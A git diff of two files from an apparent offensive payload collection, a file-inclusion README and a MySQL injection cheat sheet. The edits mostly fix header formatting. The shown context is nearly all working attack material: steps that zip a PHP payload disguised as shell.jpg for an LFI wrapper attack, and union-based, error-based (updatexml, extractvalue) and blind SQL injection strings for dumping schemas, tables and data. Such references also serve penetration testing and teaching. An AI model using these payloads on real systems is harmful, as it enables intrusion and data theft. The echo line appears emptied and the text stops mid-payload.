diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md index b7e4565..e0de154 100644 --- a/File Inclusion - Path Traversal/README.md +++ b/File Inclusion - Path Traversal/README.md @@ -72,7 +72,7 @@ http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encod LFI Wrapper ZIP ```python -echo "" > payload.php; +echo "
" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index 6d399f4..824bac1 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -1,6 +1,6 @@ # MYSQL Injection -##Detect columns number +## Detect columns number Using a simple ORDER ``` order by 1 @@ -10,7 +10,7 @@ order by 3 order by XXX ``` -##MySQL Union Based +## MySQL Union Based ``` UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=... @@ -18,13 +18,13 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_sc UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+... ``` -##MySQL Error Based - Basic +## MySQL Error Based - Basic ``` (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' ``` -##MYSQL Error Based - UpdateXML function +## MYSQL Error Based - UpdateXML function ``` AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)- AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)-- @@ -33,7 +33,7 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)-- ``` -##MYSQL Error Based - Extractvalue function +## MYSQL Error Based - Extractvalue function ``` AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))-- AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))-- @@ -42,7 +42,7 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))-- ``` -##MYSQL Blind with MAKE_SET +## MYSQL Blind with MAKE_SET ``` AND MAKE_SET(YOLO<(SELECT(length(version()))),1) AND MAKE_SET(YOLO